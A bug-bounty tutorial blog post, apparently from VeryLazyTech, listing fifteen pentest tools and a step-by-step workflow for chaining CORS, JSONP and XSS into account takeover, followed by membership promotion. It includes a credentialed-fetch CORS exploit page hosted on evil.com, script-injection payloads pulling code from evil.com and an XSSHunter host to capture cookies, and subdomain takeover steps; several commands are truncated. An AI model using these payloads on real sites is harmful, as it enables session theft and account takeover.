Did you know that a single CORS misconfiguration, blended with a sneaky JSONP endpoint or reflected XSS, can unlock full account takeover — even on "secure" apps? Most bug hunters overlook these dangerous combos… but you won't after today.

Welcome to the deep end of web pentesting, where we weaponize everyday web features and bend them into privilege escalation goldmines. We'll break down the essential tools that make chaining CORS, JSONP, and XSS not just possible, but almost easy (well, as easy as bug bounty ever gets).

Let's dig in — here's how to master account takeover with the 15 tools that the pros rely on.

Why Chaining CORS, JSONP, and XSS Works (And What Most People Miss)

Right up front: individually, Cross-Origin Resource Sharing (CORS), JSONP (JSON with Padding), and Cross-Site Scripting (XSS) look like separate bugs. But in the wild, they're often puzzle pieces of the same exploit chain. Defensive teams patch them in isolation. Attackers? They blend them.

The Typical Attack Flow

• Find a misconfigured CORS endpoint that lets your site read sensitive data.
• Pivot to a JSONP endpoint leaking credentials via a script callback.
• Drop in XSS to escalate scope, set cookies, or hijack sessions.

Each by itself is a reportable bug. Together? You've often got sweet, sweet account takeover.

[image]

The 15 Tools Every Hunter Needs for Chaining CORS, JSONP & XSS

Let's break down each tool, with honest commentary on when it shines — and when it's a total time-sink. I'll drop in code, real-world steps, and those little "huh, that's clever" tricks that don't make it into docs.

Burp Suite (Community & Pro)

No surprise here. Burp isn't just a proxy — it's the Swiss Army knife of web hacking. Let's focus on how Burp makes CORS, JSONP and XSS chaining less painful.

How to Use for CORS/JSONP/XSS Chaining

• Intercept CORS Requests:

Proxy your browser. Send requests with custom Origin headers to see what gets reflected or which origins are allowed.

• Active Scan:

Use Burp's scanner to pick up on reflected parameters, insecure CORS, and script injection points.

• Repeater & Intruder:

Try wild payloads, automate brute forcing allowed origins, or inject script tags in suspected JSONP callbacks.

Example: Hunting CORS

GET /api/account HTTP/1.1
Host: target.com
Origin: https://evil.com

Look for Access-Control-Allow-Origin: * or a reflected Origin.

If you see credentials in the response with Access-Control-Allow-Credentials: true — jackpot.

Pro Tip

Set up a custom filter in Burp to flag callback or jsonp parameters. Watch for responses with application/javascript.

2. Corsy

This one's tailored for CORS misconfigurations. Don't sleep on it.

Corsy automates detection of weak CORS policies — especially those that'll let you combine with XSS for session theft.

Usage

• Install with pip install corsy.
• Run:

python3 corsy.py -u https://target.co

Review the report — you'll quickly spot Access-Control-Allow-Origin: *, regex patterns, and credential leaks.

Why It Matters

Corsy flags subtle issues: wildcards combined with Access-Control-Allow-Credentials, or dynamic echoing of Origin. These are the ones that usually link into real account takeover flows.

3. XSStrike

For XSS, you want more than a payload list. XSStrike fuzzes parameters, detects context, and even bypasses some basic filters.

How I Use It

• Point at a target:

python3 xsstrike.py -u "https://target.com/search?q=welcome

It'll try hundreds of vectors, reporting those that actually execute.

Why It's Gold

XSStrike can identify where your XSS payload will land — attribute, tag, script, etc. This is critical when you want to chain a reflected XSS into cookie theft after exploiting CORS.

4. CORScanner

You might think, "Isn't Corsy enough?" But sometimes you need speed and breadth. CORScanner crawls and tests endpoints much faster.

Usage

python3 corscanner.py -iL targets.txt

• targets.txt is just a list of URLs.
• It'll spot "dangerous" CORS policies and output them as you go.

In Practice

I run CORScanner on subdomain lists after a recon sweep. It often finds funky CORS on old APIs the main scan misses.

5. HackBar (Browser Extension)

It's not flashy, but it's criminally underrated. HackBar sits in your browser, letting you quickly tweak requests, test XSS payloads, and mess with JSONP callbacks.

Practical Example

• Load a site with a callback= param.
• Use HackBar to inject:

callback=alert(1

Flip to XSS payloads or test for JavaScript execution.

Where It Shines

When you're in recon mode and spot a weird endpoint, HackBar lets you "poke" at it without firing up a full toolchain.

6. JSONP Hunter

Chaining JSONP is an art. JSONP Hunter finds those endpoints that will reflect your callback — even across thousands of subdomains.

How To Run

• Clone from GitHub.
• Run against your target's subdomains:

python3 jsonphunter.py -d target.com -o results.tx

Review for any endpoints that reflect your callback.

The Cool Part?

You can feed results directly into your XSS payloads. For example, if /api/?callback= reflects code — you've got a pivot to hijack accounts or steal data.

7. DalFox

DalFox is like XSStrike's hyperactive cousin. It's fast, context-aware, and still pretty easy to use.

Usage

dalfox url https://target.com/items?search=test

DalFox will spray payloads and report anything that's potentially exploitable.

Example: Real-World Chaining

• Use DalFox to pop XSS on an endpoint.
• Use CORS/U tools to see if you can read the result from another origin.
• Combine with session cookies = account takeover.

8. LinkFinder

It's all about discovery. LinkFinder sniffs out hidden endpoints in JavaScript files — perfect for finding undocumented JSONP or CORS-enabled APIs.

How to Use

• Download a JS file, then:

python3 linkfinder.py -i target.js -o output.htm

Open the output — you'll see every endpoint it found.

What You're Looking For

Endpoints like /api/v1/user?callback=, /jsonp/, or /cors/.

Feed these back into your testing pipeline.

9. Subjack

This one's more about attack surface. Subjack finds subdomain takeover opportunities, and — here's where it gets interesting — often these abandoned subdomains have unpatched CORS or JSONP.

Workflow

• Run:

subjack -w subs.txt -t 100 -ss

Claim vulnerable subdomains and point them at your server.

Test for CORS/JSONP bugs via your "owned" subdomain.

Real-World Example

I once found a forgotten api.partner.target.com with open CORS — and nobody was watching. Easy in.

10. Shodan

Not just for IoT. Shodan's search lets you find public endpoints with CORS or JSONP enabled — often APIs that were never meant to be public.

Example

• Search:

http.title:"jsonp" http.component:"nginx

or

"Access-Control-Allow-Origin: *" port:443

Why Bother?

Some of the highest value bugs come from exposed APIs with loose CORS, especially on forgotten cloud infrastructure. Shodan gives you a recon edge.

11. ParamSpider

You can't exploit what you can't find. ParamSpider harvests hidden parameters — often the ones that trigger JSONP or insecure CORS.

Usage

python3 paramspider.py --domain target.com

• Output: a list of obscure ?callback=, ?origin=, or ?url= params to test with your other tools.

12. CORS Exploit HTML Template (Manual Testing)

Okay, not a "tool" in the package-manager sense — but every pro has a stock HTML snippet to test CORS behavior in live browsers. Here's mine:

<html>
  <body>
    <script>
      fetch("https://target.com/api/account", {        credentials: "include"
      })
      .then(r => r.text())
      .then(d => document.body.innerText = d)
      .catch(e => alert(e));
    </script>
  </body>
</html>

• Host on your evil.com.
• Visit in your browser (with a logged-in target.com session).
• If you get user data — you're in business.

Why Use This?

Real browsers behave differently than curl or Burp. Always, always test in-browser before writing up a bug.

13. XSSHunter

Browser-based XSS is fun until it's hard to prove impact. XSSHunter automates payload delivery and exfiltrates data from live user sessions.

How To Set Up

• Register an instance at xsshunter.com.
• Use the payloads it gives you, e.g.:

"><script src="https://your-xsshunter-id.xss.ht"></script

When the payload fires, you get logs of cookies, DOM, and more.

Perfect For…

Chaining XSS into session hijack — and giving bug bounty triagers proof that's impossible to ignore.

14. Interactsh

For all things Out-of-Band (OOB): CORS and JSONP sometimes only show their teeth with OOB data exfiltration. Interactsh logs DNS, HTTP, and more.

Usage

• Get a unique domain from Interactsh.
• Inject payloads like:

callback=https://yourid.interact.s

Watch live logs for hits.

In Practice

OOB tools like Interactsh are crucial for finding "second-order" vulnerabilities — where your exploit doesn't get you instant data, but does prove code execution or SSRF.

15. ffuf

Last but never least: ffuf is the brute-forcing workhorse for discovering hidden endpoints. It's not CORS/JSONP-specific, but it'll fill your recon pipeline with juicy targets.

Example

ffuf -u https://target.com/FUZZ?callback=foo -w wordlist.txt -mc 200

• You might turn up new API endpoints, or find little-used JSONP routes.

Why I Love It

Speed, flexibility, and pure hacking joy. If you're bored waiting for slow tools, ffuf will keep you busy.

Step-by-Step: Chaining CORS, JSONP & XSS for Real-World Account Takeover

Let's walk through a simplified, practical example using these tools together.

Step 1: Recon With LinkFinder and ParamSpider

• Use LinkFinder on all JS files:

python3 linkfinder.py -i main.js -o links.htm

Use ParamSpider:```python3 paramspider.py — domain target.co Collate a list of suspicious endpoints like:

/api/user?callback=

/v2/data?origin=

/jsonp/profile?cb=

Step 2: Scan for CORS Weaknesses

• Run Corsy and CORScanner on the endpoints found:

python3 corsy.py -u https://target.com/api/user
python3 corscanner.py -iL list.tx

Look for:

Access-Control-Allow-Origin: *

Dynamic origin reflection

Access-Control-Allow-Credentials: true

Step 3: Test for JSONP Reflection

• Use JSONP Hunter:

python3 jsonphunter.py -d target.com -o jsonp.tx

With HackBar, test:```callback=alert(1)

callback=https://your-xsshunter-id.xss.h

Step 4: XSS Fuzzing for Execution

• Run XSStrike and DalFox:

python3 xsstrike.py -u 'https://target.com/api/user?callback=test'
dalfox url 'https://target.com/api/user?callback=test

Try payloads like:```"><script src=https://evil.com/payload.js></script

Step 5: Prove Exploitability With Manual CORS Template

• Host the earlier HTML CORS exploit on your server.
• Visit as a logged-in user.
• If sensitive data leaks, you've chained CORS and XSS.

Step 6: OOB and Impact Demo

• Use Interactsh or XSSHunter payloads in reflected parameters.
• Show the session cookie, CSRF token, or private fields in your logs.

And there you go — full account takeover, chained with free tools and some creative thinking.

Human Insights From The Field

Honestly, chaining CORS, JSONP, and XSS isn't always as clean as it sounds in blog posts. Sometimes you'll spend hours staring at headers or fiddling with race conditions. Other times, it's that forgotten API from 2017 that opens the whole door.

One thing I've noticed: the best hackers aren't just tool jockeys. They read the docs, poke at undocumented features, and try "weird" stuff — like nesting JSONP inside a CORS-allowed iframe. That's the mindset that wins bounties.

Quickfire Bonus: Tips for Going Beyond Automated Tools

• Always check request/response pairs in Burp manually. The real bugs often hide in edge cases, not mainline flows.
• Test with multiple browsers. Safari, for example, handles CORS and cookies a bit differently than Chrome.
• Don't trust "not exploitable" scans. If you can reflect a user's callback, even if not immediately XSS, think: can you trick the script into loading remote code?
• Use browser dev tools to watch cookies, localStorage, and sessionStorage changes as you poke endpoints.

Your Next Steps

Grab these tools, try the workflow above, and start poking at targets you thought were "hardened". CORS, JSONP, and XSS don't always make headlines — but when you chain them, they're pure pentesting magic.

And hey, if you find that one-in-a-thousand exploit chain? Ping me. I love a good war story. Happy hacking!

🚀 Become a VeryLazyTech Member — Get Instant Access

What you get today:

✅ 70GB Google Drive packed with cybersecurity content

✅ 3 full courses to level up fast

👉 Join the Membership → https://whop.com/verylazytech/

📚 Need Specific Resources?

✅ Instantly download the best hacking guides, OSCP prep kits, cheat sheets, and scripts used by real security pros.

👉 Visit the Shop → https://whop.com/verylazytech/

💬 Stay in the Loop

Want quick tips, free tools, and sneak peeks?

✖ https://x.com/verylazytech/

| 👾 https://github.com/verylazytech/

| 📺 https://youtube.com/@verylazytech/

| 📩 https://t.me/+mSGyb008VL40MmVk/

| 🕵️‍♂️ https://www.verylazytech.com/